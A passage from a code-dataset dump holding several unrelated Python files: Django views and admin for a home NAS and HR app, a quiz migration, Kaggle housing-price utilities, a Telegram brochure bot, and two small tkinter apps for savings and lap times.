home(request):\n # return HttpResponse(\"hello world\")\n req = REQUEST(request)\n imgs = list(HOME_PAGE_IMAGE.objects.all())\n articles = list(HOME_PAGE_ARTICALSE.objects.all())\n img = None\n try:\n img = imgs[0]\n imgs = imgs[1:]\n except:\n imgs = None\n img = None\n return render(request,\"home.html\",{\"pg_no\":1,\"imgs\":imgs,\"img\":img,\"toggle\":0,\"articles\":articles})\n\n\n\"\"\"____________\"\"\"\n#2 comes under appstore\ndef upload(request):\n req = REQUEST(request)\n objs = list()\n for oj in user_crap.objects.all():\n objs.append(oj.title)\n objs = set(objs)\n if req.LOGIN_LOGOUT().is_login():\n # if request.method == \"POST\":\n # user = request.POST.get(\"user\")\n # title = request.POST.get(\"title\")\n # file = request.FILES.get(\"file\")\n # decs = request.POST.get(\"decs\")\n # data_type = request.POST.get(\"data_type\")\n # if user != None and title != None and file != None and decs != None and data_type != None:\n # try:\n # print(type(file))\n # user_crap.objects.create(user=user,title=title,data=file,decs=decs,type_data=data_type)\n # return req.SUCCESS().success(f\"your data is uploaded file name:-{file} and title:-{title}\",req=None,upload=True,appstore=True)\n # except Exception as e:\n # print(e)\n # return req.ERROR().error(\"Some thimg went wrong\")\n # pass\n # else:\n # return req.ERROR().error(\"Some feilds are missing\")\n # # print(user,title,file,decs)\n if request.is_ajax():\n user = request.POST.get(\"user\")\n title = request.POST.get(\"title\")\n file = request.FILES.get(\"file\")\n decs = request.POST.get(\"decs\")\n data_type = request.POST.get(\"data_type\")\n if user != None and title != None and file != None and decs != None and data_type != None:\n try:\n # print(type(file))\n user_crap.objects.create(user=user,title=title,data=file,decs=decs,type_data=data_type)\n return req.SUCCESS().success(f\"your data is uploaded file name:-{file} and title:-{title}\",req=None,upload=True,appstore=True)\n except Exception as e:\n print(e)\n return req.ERROR().error(\"Some thimg went wrong\")\n pass\n else:\n return req.ERROR().error(\"Some feilds are missing\")\n # print(user,title,file,decs)\n else:\n return req.ERROR().error(\"you have to login first\")\n return render(request,\"upload.html\",{\"pg_no\":2,\"user\":str(request.user),\"objs\":objs})\n#2\ndef appstore(request):\n req = REQUEST(request)\n flag = 0\n data_type = [\"app\",\"music\",\"pdf\",\"doc\",\"video\",\"compress_file\",\"image\"]\n objs = list(user_crap.objects.all())[-100:]\n items = list()\n for oj in user_crap.objects.all():\n items.append(oj.title)\n items = set(items)\n items = list(items)\n items.extend(data_type)\n \n if request.method == \"POST\":\n item = request.POST.get(\"search\")\n copy = item\n if copy.lower() in data_type:\n temp = user_crap.objects.filter(type_data__contains=item)\n else:\n temp = user_crap.objects.filter(title__contains=item)\n objs = list(temp)\n try:\n objs[0]\n print(\" \")\n except:\n flag += 1\n \n if flag != 0:\n return req.ERROR().error(\"No data found\")\n\n return render(request,\"appstore.html\",{\"pg_no\":2,\"objs\":objs,\"items\":items})\n\n#2\n@xframe_options_sameorigin\ndef show_data(request):\n req = REQUEST(request)\n if request.method == \"POST\":\n ID = request.POST.get(\"id\")\n \n if ID != None:\n data = user_crap.objects.get(id = ID)\n \n return render(request,\"ysdfgjdgsj.html\",{\"pg_no\":2,\"data\":data})\n else:\n return req.ERROR().error(\"This page is not ment to use in this way\")\n\"\"\"____________\"\"\"\n\n#3\ndef signup(request):\n req = REQUEST(request)\n if req.LOGIN_LOGOUT().is_login():\n return req.ERROR().error(\"You are already login in for sign up you have to logout\")\n\n if request.method == \"POST\":\n # username = request.POST.get(\"username\")\n # password = request.POST.get(\"password\")\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('login')\n else:\n form = UserCreationForm()\n return render(request,\"signup.html\",{\"pg_no\":3,\"form\":form})\n# 2\n# audio\n# @csrf_exempt\n# def audio(request):\n# if request.method == \"POST\":\n# obj_id = request.POST.get('obj_id')\n# return HttpResponse(\"audio\")\n\n#4\ndef login(request):\n req = REQUEST(request)\n if req.LOGIN_LOGOUT().is_login():\n return redirect(\"home\")\n\n\n if request.method == \"POST\":\n username = request.POST.get(\"username\")\n password = request.POST.get(\"password\")\n if len(username) == 0 or len(password) == 0:\n # print(\"hello\")\n return req.ERROR().error(\"username or password is empty\")\n else:\n if(req.LOGIN_LOGOUT().user_login(username,password)):\n user = req.LOGIN_LOGOUT().ret_user()\n return req.SUCCESS().success(\"you are login\",user.is_superuser)\n else:\n return req.ERROR().error(\"Login not successful\")\n \n return render(request,\"login.html\",{\"pg_no\":4})\n\n\n\ndef logout(request):\n req = REQUEST(request)\n if req.LOGIN_LOGOUT().user_logout():\n return req.SUCCESS().success(\"you are logout\")\n else:\n return req.ERROR().error(\"Your are not login\")\n\n","repo_name":"anshjoseph/home-nas","sub_path":"HOME_NAS/interface/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6461,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38518399104","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 17 23:07:54 2017\r\n\r\n@author: vrtjso\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nimport random\r\nfrom operator import le, eq\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn import model_selection, preprocessing\r\n\r\ndef RMSLE(y, yfit):\r\n n = len(y)\r\n s = 0\r\n for i in range(0,n):\r\n s += (np.log(yfit[i] + 1) - np.log(y[i] + 1)) ** 2\r\n RMSLE = np.sqrt(s/n)\r\n return RMSLE\r\n\r\n\r\n#Objective function used for xgb\r\ndef objective(yfit, dtrain):\r\n y = dtrain.get_label()\r\n g = 2 * (np.log(yfit + 1) - np.log(y + 1)) / (yfit + 1)\r\n h = (2 - 2 * np.log(yfit + 1) + 2 * np.log(y + 1)) / ((yfit + 1) ** 2)\r\n #n = dtrain.num_row()\r\n #g = []\r\n #h = []\r\n #for i in range(0,n):\r\n # g.append(2 * (np.log(yfit[i] + 1) - np.log(y[i] + 1)) / (yfit[i] + 1))\r\n # h.append((2 - 2 * np.log(yfit[i] + 1) + 2 * np.log(y[i] + 1)) / ((yfit[i] + 1) ** 2))\r\n return g, h\r\n\r\n#Metric used for xgb cv\r\ndef eval_metric(yfit, dtrain):\r\n y = dtrain.get_label()\r\n return 'error', RMSLE(y,yfit)\r\n\r\ndef CreateOutput(prediction):\r\n output = pd.read_csv('test.csv')\r\n output = output[['id']]\r\n output['price_doc'] = prediction\r\n output.to_csv('Submission.csv',index=False)\r\n \r\n \r\n#load data\r\ndef loadTraindata(takeLog=True):\r\n #filename = 'train.csv'\r\n filename = 'train_featured.csv'\r\n rawDf = pd.read_csv(filename)\r\n Ytrain = rawDf['price_doc'].values\r\n Xtrain = rawDf.drop(['price_doc','w'], 1).values\r\n return Ytrain, Xtrain\r\n\r\ndef loadTestdata():\r\n #filename = 'test.csv'\r\n filename = 'test_featured.csv'\r\n rawDf = pd.read_csv(filename)\r\n Xtest = rawDf.values\r\n return Xtest\r\n\r\n#load random small part of data for fast model testing\r\ndef loadSample(n=300):\r\n #filename = 'train.csv'\r\n #filename = 'train_cleaned.csv'\r\n filename = 'train_featured.csv'\r\n size = pd.read_csv(filename).shape[0]\r\n skip = sorted(random.sample(range(1,size+1),size-n))\r\n rawDf = pd.read_csv(filename, skiprows = skip)\r\n\r\n Ytrain = rawDf['log_price'].values\r\n Xtrain = rawDf.drop(['log_price'], 1).values\r\n return Ytrain, Xtrain\r\n\r\n#Used to undersample strange values\r\ndef sample_vals(df, price_value, ratio, condition):\r\n indices = condition(df.price_doc, price_value) & (df.product_type == 0)\r\n df_resampled = df.loc[indices].sample(frac=ratio)\r\n df_remaining = df.loc[~indices]\r\n df_new = pd.concat([df_resampled, df_remaining], axis=0)\r\n return df_new\r\n\r\n#Encoding dummy variables\r\ndef Encoding(TestEncoding = True):\r\n filename = 'test.csv' if TestEncoding else 'train.csv'\r\n rawDf = pd.read_csv(filename)\r\n \r\n #Drop variable with no use and small variance, and sub area\r\n rawDf = rawDf.drop([\"id\",\"ID_metro\",\"ID_railroad_station_walk\",\"ID_railroad_station_avto\",\r\n \"ID_big_road1\", \"ID_big_road2\", \"ID_railroad_terminal\", \"ID_bus_terminal\"],1)\r\n rawDf = rawDf.drop([\"culture_objects_top_25_raion\",\"oil_chemistry_raion\",\"railroad_terminal_raion\",\r\n \"nuclear_reactor_raion\", \"build_count_foam\", \"big_road1_1line\",\"railroad_1line\",\r\n \"office_sqm_500\", \"trc_sqm_500\", \"cafe_count_500_price_4000\", \"cafe_count_500_price_high\",\r\n \"mosque_count_500\", \"leisure_count_500\", \"office_sqm_1000\", \"trc_sqm_1000\",\r\n \"cafe_count_1000_price_high\", \"mosque_count_1000\", \"cafe_count_1500_price_high\",\r\n \"mosque_count_1500\", \"cafe_count_2000_price_high\"],1)\r\n #rawDf = rawDf.drop('sub_area',1)\r\n \r\n result = rawDf\r\n for i in range(1,rawDf.shape[1]): #Do not encode timestamp\r\n if rawDf.ix[:,i].dtype == np.object:\r\n varName = rawDf.columns[i]\r\n if varName == 'sub_area':\r\n dummy_ranks = pd.get_dummies(rawDf[varName], prefix = varName)\r\n else:\r\n dummy_ranks = pd.get_dummies(rawDf[varName], prefix = varName, drop_first=True)\r\n result = pd.concat([result, dummy_ranks], axis=1)\r\n result = result.drop(varName, 1)\r\n varName = 'material' #special case\r\n dummy_ranks = pd.get_dummies(rawDf[varName], prefix = varName)\r\n result = pd.concat([result, dummy_ranks], axis=1)\r\n result = result.drop(varName, 1)\r\n outputFile = 'test_encoded.csv' if TestEncoding else 'train_encoded.csv'\r\n result.to_csv(outputFile,index=False)\r\n #return result\r\n\r\n#用PCA合并同一个系列高度相关的feature\r\ndef FeatureCombination(Df,s='',num_feature=2): \r\n feature_set = []\r\n for c in Df.columns:\r\n if c.startswith(s): feature_set.append(c)\r\n print('combining', len(feature_set), 'features')\r\n data = Df[feature_set].values\r\n\r\n for c in Df.columns:\r\n if Df[c].dtype == 'object':\r\n lbl = preprocessing.LabelEncoder()\r\n lbl.fit(list(Df[c].values))\r\n Df[c] = lbl.transform(list(Df[c].values))\r\n \r\n imp = preprocessing.Imputer()\r\n data = imp.fit_transform(data)\r\n data = preprocessing.scale(data)\r\n pca = PCA(num_feature)\r\n pca.fit(data)\r\n print('explained_variance_ratio_:', pca.explained_variance_ratio_)\r\n trans = pca.transform(data)\r\n for i in range(0,num_feature):\r\n Df[s+'_%d'%(i+1)] = trans[:,i]\r\n Df.drop(feature_set,1,inplace=True)\r\n return Df","repo_name":"LenzDu/Kaggle-Competition-Sberbank","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":5320,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"53"} +{"seq_id":"20556965249","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n STR_DATE_CREATED = b'date created'\n STR_DATE_UPDATED = b'date updated'\n STR_QUIZ_QUESTION = 'quiz.Question'\n STR_QUIZ_QUIZ = 'quiz.Quiz'\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Question',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('created_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_CREATED)),\n ('lastupdated_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_UPDATED)),\n ('title', models.TextField()),\n ('type', models.CharField(default=b'multichoice',\n max_length=15,\n choices=[(b'multichoice',\n b'Multiple choice'),\n (b'shortanswer'\n b'Short answer'),\n (b'matching',\n b'Matching'),\n (b'numerical',\n b'Numerical'),\n (b'multiselect',\n b'Multiple select'),\n (b'description',\n b'Information only'),\n (b'essay',\n b'Essay question')])),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'Question',\n 'verbose_name_plural': 'Questions',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuestionProps',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('value', models.TextField(blank=True)),\n ('question', models.ForeignKey(to=STR_QUIZ_QUESTION,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuestionProp',\n 'verbose_name_plural': 'QuestionProps',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='Quiz',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('created_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_CREATED)),\n ('lastupdated_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_UPDATED)),\n ('draft', models.BooleanField(default=False)),\n ('deleted', models.BooleanField(default=False)),\n ('title', models.TextField()),\n ('description', models.TextField(blank=True)),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'Quiz',\n 'verbose_name_plural': 'Quizzes',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuizAttempt',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('attempt_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=b'date attempted')),\n ('submitted_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=b'date submitted')),\n ('score', models.DecimalField(max_digits=6,\n decimal_places=2)),\n ('maxscore', models.DecimalField(max_digits=6,\n decimal_places=2)),\n ('ip', models.IPAddressField()),\n ('instance_id', models.CharField(max_length=50,\n null=True,\n blank=True)),\n ('agent', models.TextField(blank=True)),\n ('quiz', models.ForeignKey(to=STR_QUIZ_QUIZ,\n on_delete=models.CASCADE)),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuizAttempt',\n 'verbose_name_plural': 'QuizAttempts',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuizAttemptResponse',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('score', models.DecimalField(max_digits=6,\n decimal_places=2)),\n ('text', models.TextField(blank=True)),\n ('question', models.ForeignKey(to=STR_QUIZ_QUESTION,\n on_delete=models.CASCADE)),\n ('quizattempt', models.ForeignKey(to='quiz.QuizAttempt',\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuizAttemptResponse',\n 'verbose_name_plural': 'QuizAttemptResponses',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuizProps',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('value', models.TextField(blank=True)),\n ('quiz', models.ForeignKey(to=STR_QUIZ_QUIZ,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuizProp',\n 'verbose_name_plural': 'QuizProps',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuizQuestion',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('order', models.IntegerField(default=1)),\n ('question', models.ForeignKey(to=STR_QUIZ_QUESTION,\n on_delete=models.CASCADE)),\n ('quiz', models.ForeignKey(to=STR_QUIZ_QUIZ,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuizQuestion',\n 'verbose_name_plural': 'QuizQuestions',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='Response',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('created_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_CREATED)),\n ('lastupdated_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_UPDATED)),\n ('score', models.DecimalField(default=0,\n max_digits=6,\n decimal_places=2)),\n ('title', models.TextField()),\n ('order', models.IntegerField(default=1)),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)),\n ('question', models.ForeignKey(to=STR_QUIZ_QUESTION,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'Response',\n 'verbose_name_plural': 'Responses',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='ResponseProps',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('value', models.TextField(blank=True)),\n ('response', models.ForeignKey(to='quiz.Response',\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'ResponseProp',\n 'verbose_name_plural': 'ResponseProps',\n },\n bases=(models.Model, ),\n ),\n migrations.AddField(\n model_name='quiz',\n name='questions',\n field=models.ManyToManyField(to=STR_QUIZ_QUESTION,\n through='quiz.QuizQuestion'),\n preserve_default=True,\n ),\n ]\n","repo_name":"DigitalCampus/django-oppia","sub_path":"quiz/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":11507,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"25122188394","text":"# Bu araç @keyiflerolsun tarafından | @KekikAkademi için yazılmıştır.\n\nfrom telethon import TelegramClient\nfrom telethon.sessions import StringSession\nfrom telethon.errors.rpcerrorlist import MediaEmptyError\n\nfrom contextlib import suppress\nfrom json import loads\nfrom aiofiles import open\nfrom os import environ, path\nfrom veri_ver import a101_brosurler\n\nclient = TelegramClient(\n session = StringSession(),\n api_id = int(environ.get(\"TG_API_ID\")),\n api_hash = environ.get(\"TG_API_HASH\")\n).start(bot_token = environ.get(\"TG_BOT_TOKEN\"))\n\nasync def aktuel_robot():\n if path.isfile(\"A101.json\"):\n async with open(\"A101.json\", \"r+\", encoding=\"utf-8\") as dosya:\n eski_veriler = loads(await dosya.read())\n else:\n eski_veriler = {}\n\n yeni_veriler = await a101_brosurler()\n\n for anahtar, resimler in yeni_veriler.items():\n if not resimler:\n continue\n\n eski_resimler = eski_veriler.get(anahtar, [])\n yeni_resimler = [resim for resim in resimler if resim not in eski_resimler]\n\n for resim in yeni_resimler:\n try:\n await client.send_file(int(environ.get(\"TG_MESAJ_ID\")), resim, caption=f\"**{anahtar}**\")\n except Exception as hata:\n print(f\"Resim : {resim}\")\n print(f\"Hata : {type(hata).__name__} - {hata}\")\n\nif __name__ == \"__main__\":\n with client:\n client.loop.run_until_complete(aktuel_robot())","repo_name":"keyiflerolsun/A101AktuelRobot","sub_path":"basla.py","file_name":"basla.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"tr","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"2490615892","text":"from django.contrib import admin\nfrom django.contrib.auth import forms\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.contrib.auth.base_user import BaseUserManager\n# Register your models here.\n\nfrom .models import User, UserProfile, EmployeeIDInformation, EmployeeNextOfKin, EmployeeMaritalInformation, EmployeeDependants, EmployeeBankInformation\nfrom .forms import UserCreationForm, UserChangeForm, RegistrationForm\n\nemployeeModels = [EmployeeIDInformation, EmployeeNextOfKin, EmployeeMaritalInformation, EmployeeDependants, EmployeeBankInformation]\n\nclass EmployeeBankInformationInline(admin.StackedInline):\n model = EmployeeBankInformation\n can_delete = False\n verbose_plural_name =\"Employee Bank Information\"\n foreignkey_name = 'staffID'\n\nclass EmployeeDependantsInline(admin.StackedInline):\n model = EmployeeDependants\n can_delete = False\n verbose_plural_name =\"Employee Dependants Information\"\n foreignkey_name = 'staffID'\n\nclass EmployeeMaritalInformationInline(admin.StackedInline):\n model = EmployeeMaritalInformation\n can_delete = False\n verbose_plural_name =\"Employee Marital Information\"\n foreignkey_name = 'staffID'\n\nclass EmployeeNextOfKinInline(admin.StackedInline):\n model = EmployeeNextOfKin\n can_delete = False\n verbose_plural_name =\"Employee Next of Kin Information\"\n foreignkey_name = 'staffID'\n\nclass EmployeeIDInformationInline(admin.StackedInline):\n model = EmployeeIDInformation\n can_delete = False\n verbose_plural_name =\"Employee ID Information\"\n foreignkey_name = 'staffID'\n\nclass UserProfileInline(admin.StackedInline):\n model = UserProfile\n can_delete = False\n verbose_plural_name =\"User Profile\"\n foreignkey_name = 'user'\n\nclass CustomUserAdmin(UserAdmin):\n model = User\n form = UserChangeForm\n add_form = UserCreationForm\n\n list_display = ('email', 'first_name', 'last_name', 'username', 'phone_number', 'is_staff', 'is_superuser', 'date_of_birth')\n # inlines = (EmployeeIDInformationInline,)\n inlines = (UserProfileInline, EmployeeIDInformationInline, EmployeeNextOfKinInline, EmployeeMaritalInformationInline, \n EmployeeDependantsInline, EmployeeBankInformationInline,)\n list_filter = ['is_superuser']\n\n add_fieldsets = UserAdmin.add_fieldsets + (\n ('Personal Information',\n {'fields':(\n 'email',\n ('first_name', 'middle_name', 'last_name', 'date_of_birth', 'gender')\n , 'phone_number', 'city','country',)\n }),\n ('Company Information',{\n 'fields':(\n 'is_staff', 'is_superuser','is_active',\n )\n }),\n )\n\n fieldsets = UserAdmin.fieldsets + (\n ('Personal Information', \n {'fields':(\n 'gender', 'city','country','date_of_birth',\n )\n }),\n )\n\n search_fields = ('email', 'phone_number')\n ordering = ['email']\n filter_horizontal = ()\n\n def get_inline_instances(self, request, obj=None):\n if not obj:\n return list()\n return super(CustomUserAdmin, self).get_inline_instances(request, obj)\n\nadmin.site.register(User, CustomUserAdmin)\n\n","repo_name":"inziani/UnoBackEnd","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41683813564","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 16 12:00:54 2018\n\n@author: wegmarken\n\"\"\"\nimport tkinter as tk\nimport my_date_picker as mdp\nfrom datetime import datetime\nimport math\nimport configparser\n\ndef days_between(d1, d2):\n d1 = datetime.strptime(d1, \"%Y-%m-%d\")\n d2 = datetime.strptime(d2, \"%Y-%m-%d\")\n return abs((d2 - d1).days)\n\nclass Config:\n def __init__(self):\n filename = \"config.ini\"\n config = configparser.ConfigParser()\n rd = config.read(filename)\n if rd == []:\n config[\"DEFAULT\"] = {\"IniAmount\": \"1000\", \"MonthlyIncome\": \"100\"}\n with open(filename, 'w') as configfile:\n config.write(configfile)\n self.ini_amount = float(config[\"DEFAULT\"][\"IniAmount\"])\n self.monthly_income = float(config[\"DEFAULT\"][\"MonthlyIncome\"])\n\nclass MainGUI:\n def __init__(self, root):\n root = root\n root.title(\"Fin\")\n root.geometry(\"640x480\")\n\n self.mainframe = tk.Frame(root)\n self.mainframe.grid(column=0, row=0)\n self.mainframe.columnconfigure(0, weight=1)\n self.mainframe.rowconfigure(0, weight=1)\n\n def add_date_field(self, row, col, var, ltext):\n label = tk.Label(self.mainframe, text=ltext)\n entry = tk.Entry(self.mainframe, textvariable=var)\n btn = tk.Button(self.mainframe, text=\"Date\", bg=\"white\", fg=\"blue\", command=lambda: mdp.MyDatePicker(entry))\n label.grid(column=col, row=row)\n entry.grid(column=col + 1, row=row)\n btn.grid(column=col + 2, row=row)\n\n def add_result_field(self, row, col, func, var):\n btn = tk.Button(self.mainframe, text=\"Result\", bg=\"white\", fg=\"blue\", command=func)\n label = tk.Label(self.mainframe, textvariable=var)\n btn.grid(column=col, row=row)\n label.grid(column=col + 1, row=row)\n\n def add_num_entry_field(self, row, col, var, ltext):\n label = tk.Label(self.mainframe, text=ltext)\n entry = tk.Entry(self.mainframe, textvariable=var)\n label.grid(column=col, row=row)\n entry.grid(column=col + 1, row=row)\n\n\n\nroot = tk.Tk()\nm_gui = MainGUI(root)\n\nconfig = Config()\ntoday = datetime.today().strftime('%Y-%m-%d')\n\nstart_amount = tk.DoubleVar()\nstart_amount.set(config.ini_amount)\nm_gui.add_num_entry_field(row=1, col=1, var=start_amount, ltext=\"Start Amount\")\n\nstart_date = tk.StringVar()\nstart_date.set(today)\nm_gui.add_date_field(row=2, col=1, var=start_date, ltext=\"Start Date\")\n\nmonth_income = tk.DoubleVar()\nmonth_income.set(config.monthly_income)\nm_gui.add_num_entry_field(row=3, col=1, var=month_income, ltext=\"Monthly Income\")\n\nend_mi_date = tk.StringVar()\nend_mi_date.set(today)\nm_gui.add_date_field(row=4, col=1, var=end_mi_date, ltext=\"End In. Date\")\n\nend_date = tk.StringVar()\nend_date.set(today)\nm_gui.add_date_field(row=5, col=1, var=end_date, ltext=\"End Date\")\nres = tk.DoubleVar()\ndef fres():\n d1 = days_between(end_mi_date.get(), start_date.get())\n to_add = math.floor(d1/30)*month_income.get()\n res.set(start_amount.get() + to_add)\n\nm_gui.add_result_field(row=7, col=1, func=fres, var=res)\n\nroot.mainloop()\n\n\n\n\n","repo_name":"wegmarken2006/tk1","sub_path":"tk1_1.py","file_name":"tk1_1.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73764972328","text":"from tkinter import Tk, Label, Entry, Button, Toplevel, Scrollbar, Listbox, messagebox\r\nfrom PIL import Image, ImageTk\r\nimport io\r\nimport requests\r\nimport re\r\n\r\nclass LapTracker:\r\n def __init__(self, root):\r\n # Initialize the LapTracker class with a Tkinter root window\r\n self.root = root\r\n # Initialize empty list to store lap times for each racer\r\n self.lap_times = []\r\n # Initialize Toplevel window for displaying lap times and setting its value to None\r\n self.lap_time_window = None\r\n self.lap_time_display_window = None\r\n # Initialize list of racer names with empty strings\r\n self.racer_names = [\"\", \"\", \"\", \"\"]\r\n # Initialize lists to store racer name labels and entry widgets\r\n self.racer_labels = []\r\n self.racer_entries = []\r\n # Create racer name labels and entry widgets for each racer\r\n for i in range(4):\r\n racer_name_label = Label(root, text=f\"Racer {i+1} Name:\")\r\n racer_name_entry = Entry(root)\r\n racer_name_entry.insert(0, \"NAME\")\r\n racer_name_label.grid(row=i, column=0, padx=5, pady=5, sticky=\"W\")\r\n racer_name_entry.grid(row=i, column=1, padx=5, pady=5, sticky=\"E\")\r\n self.racer_labels.append(racer_name_label)\r\n self.racer_entries.append(racer_name_entry)\r\n\r\n lap_time_label = Label(root, text=f\"Racer {i+1} Lap Time:\")\r\n lap_time_entry = Entry(root)\r\n lap_time_entry.insert(0, \"01.00\")\r\n lap_time_label.grid(row=i+4, column=0, padx=5, pady=5, sticky=\"W\")\r\n lap_time_entry.grid(row=i+4, column=1, padx=5, pady=5, sticky=\"E\")\r\n self.racer_entries.append(lap_time_entry)\r\n\r\n # Create a lap time instruction label\r\n lap_time_instruction_label = Label(root, text=\"Edit the name and times (e.g. 23.456)\")\r\n lap_time_instruction_label.grid(row=4, column=2, padx=3, pady=3, sticky=\"W\")\r\n lap_time_instruction_label = Label(root, text=\" Leave name and time alone if not in use\")\r\n lap_time_instruction_label.grid(row=5, column=2, padx=3, pady=3, sticky=\"W\")\r\n lap_time_instruction_label = Label(root, text=\" I want to say thanks to Ryan and Emily for their time and dedication to teaching programming\")\r\n lap_time_instruction_label.grid(row=6, column=2, padx=3, pady=3, sticky=\"W\")\r\n # Create a submit button to submit lap times\r\n self.submit_button = Button(root, text=\"Submit\", command=self.submit_lap_times)\r\n self.submit_button.grid(row=9, column=1, pady=5, sticky=\"E\")\r\n # Load an image from a URL using the requests and PIL libraries and display it in a Label widget\r\n img_url = \"https://i.ibb.co/3T2QgC3/45.png\"\r\n img_bytes = requests.get(img_url).content\r\n img = Image.open(io.BytesIO(img_bytes))\r\n img = img.resize((300, 200), Image.ANTIALIAS)\r\n photo = ImageTk.PhotoImage(img)\r\n label = Label(root, image=photo)\r\n label.image = photo\r\n label.grid(row=10, column=0, columnspan=2, padx=5, pady=5)\r\n\r\n # Create an exit button to close the application window\r\n exit_button = Button(root, text=\"Exit\", command=root.destroy)\r\n exit_button.grid(row=11, column=1, pady=5, sticky=\"E\")\r\n\r\n def is_valid_lap_time(self, lap_time):\r\n if lap_time == \"\":\r\n return False\r\n try:\r\n return float(lap_time) > 0\r\n except ValueError:\r\n return False\r\n def is_valid_name(self, name):\r\n # Check if name contains only letters\r\n return bool(re.match(\"^[a-zA-Z]*$\", name))\r\n def show_error_message(self, message):\r\n messagebox.showerror(\"Error\", message)\r\n def submit_lap_times(self):\r\n # Get racer names and lap times from the entry widgets and add them to the lap_times list\r\n lap_times = []\r\n for i in range(len(self.racer_entries)):\r\n if i % 2 == 0:\r\n racer_name = self.racer_entries[i].get()\r\n if not racer_name:\r\n # If racer name is empty, show an error message and return\r\n self.show_error_message(\"Racer name cannot be empty.\")\r\n return\r\n else:\r\n self.racer_names[i // 2] = racer_name\r\n else:\r\n lap_time = self.racer_entries[i].get()\r\n if not self.is_valid_lap_time(lap_time):\r\n # If lap time is invalid, show an error message and return\r\n self.show_error_message(\"Invalid lap time format. Lap time should be in the format mm:ss.ms (e.g. 23.456).\")\r\n return\r\n elif lap_time:\r\n lap_times.append((self.racer_names[i // 2], lap_time))\r\n # If the lap time display window has not been created, create it and display the lap times\r\n if self.lap_time_display_window is None:\r\n self.lap_time_display_window = Toplevel(self.root)\r\n self.lap_time_display_window.title(\"Lap Times\")\r\n self.lap_time_display_window.geometry(\"400x300\")\r\n # Load an image from a URL using the requests and 